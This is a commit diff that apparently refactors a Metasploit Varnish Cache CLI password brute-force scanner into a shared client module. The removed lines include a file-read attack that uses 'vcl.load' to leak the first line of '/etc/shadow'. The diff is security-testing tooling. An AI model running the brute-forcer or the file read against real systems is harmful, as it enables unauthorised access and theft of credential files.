saving before changing branches

Author: h00die

lib/metasploit/framework/login_scanner/varnish.rb

@@ -1,3 +1,5 @@
+require 'metasploit/framework/tcp/client'
+require 'metasploit/framework/varnish/client'
 require 'metasploit/framework/login_scanner/base'
 require 'metasploit/framework/login_scanner/rex_socket'
 
@@ -6,12 +8,12 @@ module Framework
     module LoginScanner
 
       # This is the LoginScanner class for dealing with Varnish CLI.
-      # It is responsible for taking a single target, and a list of credentials
-      # and attempting them. It then saves the results.
+
       class VarnishCLI
         include Metasploit::Framework::LoginScanner::Base
         include Metasploit::Framework::LoginScanner::RexSocket
         include Metasploit::Framework::Tcp::Client
+        include Metasploit::Framework::Varnish::Client
 
         DEFAULT_PORT         = 6082
         LIKELY_PORTS         = [ DEFAULT_PORT ]
@@ -20,47 +22,25 @@ class VarnishCLI
         REALM_KEY           = nil
 
         def attempt_login(credential)
-          result_opts = {
-            credential: credential,
-            host: host,
-            port: port,
-            service_name: 'varnishcli',
-            protocol: 'tcp',
-            max_send_size: datastore['TCP::max_send_size'],
-            send_delay: datastore['TCP::send_delay']
-          }
           begin
-            disconnect if self.sock
             connect
-            sock.put("auth #{Rex::Text.rand_text_alphanumeric(3)}\n") # Cause a login fail to get the challenge
-            res = sock.get_once(-1,3) # grab challenge
-            if res && res =~ /107 \d+\s\s\s\s\s\s\n(\w+)\n\nAuthentication required./ # 107 auth
-              challenge = $1
-              response = challenge + "\n"
-              response << credential.private + "\n"
-              response << challenge + "\n"
-              #secret = pass + "\n" # newline is needed
-              #response = challenge + "\n" + secret + challenge + "\n"
-              response = Digest::SHA256.hexdigest(response)
-              sock.put("auth #{response}\n")
-              res = sock.get_once(-1,3)
-              if res && res =~ /107 \d+/ # 107 auth
-                result_opts.merge!(status: Metasploit::Model::Login::Status::INCORRECT, proof: res)
-              elsif res.nil?
-                result_opts.merge!(status: Metasploit::Model::Login::Status::INCORRECT, proof: 'No response')
-              elsif res =~ /200 \d+/ # 200 ok
-                result_opts.merge!(status: Metasploit::Model::Login::Status::SUCCESSFUL, proof: res)
-              end
-            elsif res && res =~ /Varnish Cache CLI 1.0/
-              result_opts.merge!(status: Metasploit::Model::Login::Status::SUCCESSFUL, proof: 'No Authentication Required')
-            else
-              result_opts.merge!(status: Metasploit::Model::Login::Status::INCORRECT, proof: 'Unknown Response')
+          rescue Rex::ConnectionError, EOFError, Timeout::Error
+            status = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+          else
+            begin
+              success = login(credential.private)
+            rescue RuntimeError => e
+              return {:status => Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, :proof => e.message}
             end
-            disconnect
-          rescue ::EOFError, Errno::ECONNRESET, Rex::ConnectionError, Rex::ConnectionTimeout, ::Timeout::Error
-            result_options[:status] = Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
+
+            status = (success == true) ? Metasploit::Model::Login::Status::SUCCESSFUL : Metasploit::Model::Login::Status::INCORRECT
           end
-          Result.new(result_opts)
+          result = Result.new(credential: credential, status: status)
+          result.host         = host
+          result.port         = port
+          result.protocol     = 'tcp'
+          result.service_name = 'varnishcli'
+          result
         end
 
         def set_sane_defaults

lib/metasploit/framework/varnish/client.rb

@@ -0,0 +1,56 @@
+# -*- coding: binary -*-
+require 'msf/core'
+require 'msf/core/exploit/tcp'
+
+module Metasploit
+  module Framework
+    module Varnish
+      module Client
+
+
+        def login(pass)
+          begin
+            if require_auth?
+              sock.put("auth #{Rex::Text.rand_text_alphanumeric(3)}\n") # Cause a login fail to get the challenge
+              res = sock.get_once(-1,3) # grab challenge
+              if res && res =~ /107 \d+\s\s\s\s\s\s\n(\w+)\n\nAuthentication required./ # 107 auth
+                challenge = $1
+                response = challenge + "\n"
+                response << pass + "\n"
+                response << challenge + "\n"
+                response = Digest::SHA256.hexdigest(response)
+                sock.put("auth #{response}\n")
+                res = sock.get_once(-1,3)
+                if res && res =~ /200 \d+/ # 200 ok
+                  return true
+                else
+                  return false
+                end
+              else
+                raise RuntimeError, "Varnish Login timeout"
+              end
+            end
+          rescue Timeout::Error
+            raise RuntimeError, "Varnish Login timeout"
+          end
+        end
+
+        def close_session
+          sock.put('quit')
+        end
+        
+        def require_auth?
+          sock.put("auth #{Rex::Text.rand_text_alphanumeric(3)}\n") # Cause a login fail to get the challenge
+          res = sock.get_once(-1,3) # grab challenge
+            if res && res =~ /107 \d+\s\s\s\s\s\s\n(\w+)\n\nAuthentication required./ # 107 auth
+              return true
+            else
+              return false
+            end
+        end
+
+      end
+    end
+  end
+end
+

modules/auxiliary/scanner/varnish/varnish_cli_bruteforce.rb renamed to modules/auxiliary/scanner/varnish/varnish_cli_login.rb

@@ -6,6 +6,7 @@
 require 'msf/core'
 require 'metasploit/framework/credential_collection'
 require 'metasploit/framework/login_scanner/varnish'
+require 'metasploit/framework/tcp/client'
 
 class MetasploitModule < Msf::Auxiliary
 
@@ -15,10 +16,9 @@ class MetasploitModule < Msf::Auxiliary
 
   def initialize
     super(
-      'Name'           => 'Varnish Cache CLI Login Utility and File Read',
+      'Name'           => 'Varnish Cache CLI Login Utility',
       'Description'    => 'This module attempts to login to the Varnish Cache (varnishd) CLI instance using a bruteforce
-                           list of passwords. This module will also cause an error in Varnish by load an arbitrary file
-                           in order to read the first line of content from the insuing error message.',
+                           list of passwords.',
       'References'     =>
         [
           [ 'OSVDB', '67670' ],
@@ -38,10 +38,7 @@ def initialize
       [
         Opt::RPORT(6082),
         OptPath.new('PASS_FILE',  [ false, 'File containing passwords, one per line',
-          File.join(Msf::Config.data_directory, 'wordlists', 'unix_passwords.txt') ]),
-        OptPath.new('FILE', [true, 'File to retrieve first line of', '/etc/shadow']),
-        OptString.new('USERNAME', [false, 'A specific username to authenticate as', '<BLANK>']),
-        OptBool.new('USER_AS_PASS', [false, 'Try the username as the password for all users', false])
+          File.join(Msf::Config.data_directory, 'wordlists', 'unix_passwords.txt') ])
       ], self.class)
 
     # no username, only a shared key aka password
@@ -51,7 +48,7 @@ def initialize
     # usernames that are passed in.
     @strip_usernames = true
   end
-  
+
   def setup
     super
     # They must select at least blank passwords, provide a pass file or a password
@@ -66,41 +63,10 @@ def setup
     end
   end
 
-  def read_file(password)
-    connect
-    sock.put("auth #{Rex::Text.rand_text_alphanumeric(3)}\n") # Cause a login fail.
-    res = sock.get_once(-1,3) # grab challenge
-    if res && res =~ /107 \d+\s\s\s\s\s\s\n(\w+)\n\nAuthentication required./ # 107 auth
-      challenge = $1
-      response = challenge + "\n"
-      response << password + "\n"
-      response << challenge + "\n"
-      response = Digest::SHA256.hexdigest(response)
-      sock.put("auth #{response}\n")
-      res = sock.get_once(-1,3)
-    end
-    sock.put("vcl.load #{Rex::Text.rand_text_alphanumeric(3)} #{datastore['FILE']}\n") # only returns 1 line of any target file.
-    res = sock.get_once(-1,3)
-
-    # example format from /etc/shadow on an ubuntu box
-    # Message from VCC-compiler:
-    # Syntax error at
-    # ('input' Line 1 Pos 5)
-    # root:!:17123:0:99999:7:::
-    # ----#--------------------
-
-    if res && res =~ /\('input' Line \d Pos \d\)\n(...+)\n/
-      print_good("First line of #{datastore['FILE']}: #{$1}:")
-    else
-      vprint_error("Unable to read #{datastore['FILE']}:\n#{res}\n")
-    end
-    disconnect
-  end
-
   def run_host(ip)
     cred_collection = Metasploit::Framework::CredentialCollection.new(
       pass_file: datastore['PASS_FILE'],
-      username: ''
+      username: '<BLANK>'
     )
     vprint_status('made cred collector')
     scanner = Metasploit::Framework::LoginScanner::VarnishCLI.new(
@@ -115,7 +81,6 @@ def run_host(ip)
     )
     vprint_status('made scanner')
     scanner.scan! do |result|
-      print(result)
       credential_data = result.to_h
       credential_data.merge!(
         module_fullname: fullname,
@@ -127,9 +92,6 @@ def run_host(ip)
         create_credential_login(credential_data)
 
         print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential.private}"
-        connect
-        read_file(result.credential.private)
-        disconnect
       else
         invalidate_login(credential_data)
         vprint_status "#{ip}:#{rport} - LOGIN FAILED: #{result.credential.private} (#{result.status})"